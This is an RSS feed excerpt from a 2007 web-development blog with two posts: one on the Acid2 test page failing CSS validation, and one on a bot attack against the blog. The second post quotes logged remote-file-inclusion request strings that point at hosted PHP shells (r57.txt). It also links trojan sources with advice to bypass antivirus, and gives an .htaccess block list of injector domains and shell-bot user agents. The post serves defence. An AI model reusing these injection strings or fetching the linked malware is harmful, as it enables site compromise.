Kakkoi » owned http://42.kaizeku.com web development, software, windows tips and trick Sat, 12 Jul 2008 15:10:01 +0000 http://wordpress.org/?v=2.6 en The Web Standard Group - ACID2 Test page Failed W3C CSS Validation http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/ http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/#comments Sat, 22 Dec 2007 14:53:25 +0000 Nick B http://blog.kakkoi.net/owned/acid2-failed-w3c-css-validation/ I'm following up recent announcements on IEBLOG Internet Explorer 8 and Acid2: A Milestone. To my surprise, the Web Standard Groups ACID2 Test Page doesn't conform to W3C CSS Validation.

The Errors

9 errors & 31 warnings. 
Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink

Full page Screenshot

ACID2 failed W3C validation

]]>

I’m following up recent announcements on IEBLOG Internet Explorer 8 and Acid2: A Milestone. To my surprise, the Web Standard Groups ACID2 Test Page doesn’t conform to W3C CSS Validation.

The Errors

9 errors & 31 warnings.

Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink

Full page Screenshot

ACID2 failed W3C validation

Update: Just got ping from chaoskaizer. She said the CSS ERROR is part of the Web Standards Test Suit.

]]> http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/feed/ Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/ http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/#comments Fri, 21 Dec 2007 22:48:35 +0000 Noah Ark http://blog.kakkoi.net/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/ For this past three days this blog is suffering DOS attack . The attack is still alive now I don't think they will leave yet. I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP. 
OrgName:    Google Inc.
OrgID:      GOGL
Address:    1600 Amphitheatre Parkway
City:       Mountain View
StateProv:  CA
PostalCode: 94043
Country:    US

At the time being I blocked all remote streams from their random host *.com and "perl bot signature" but blocking will not stop them from hammering this site. I'll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

Type of injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.]]>

cat ownedFor this past three days this blog is suffering DOS attack . The attack is still alive now I don’t think they will leave yet.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.

OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

Type of injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.

/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?

To view the following source you need to exclude the website host from your anti-virus program.

  • Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
  • PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet)

If you has similar problems. you should block the following domain in your htaccess.
mod_setenvif

SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
</FilesMatch>

if u arent sure if you server support mod_setenvif wrap it like the below example.

<IfModule mod_setenvif.c>
#...replace this line with the above code...
</IfModule>

How to trap Perl Shell Bot

We need a pattern to trap this bots. certainly we knew that these bots :

  • doesn’t honor robot.txt
  • they crawl all subdirectory
  • they has a pattern URI request

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.

I’ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.

Recent Scan & Update

The below list is automatically added.

December 24, 2007
ip: 64.26.63.10 param: login=,? inject: http://pawang.in/r57.txt
December 24, 2007
ip: 64.26.63.10 param: dir=,login= inject: http://pawang.in/r57.txt????
December 25, 2007
ip: 59.158.128.138 param: p=,:allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt

External Resources

]]> http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/feed/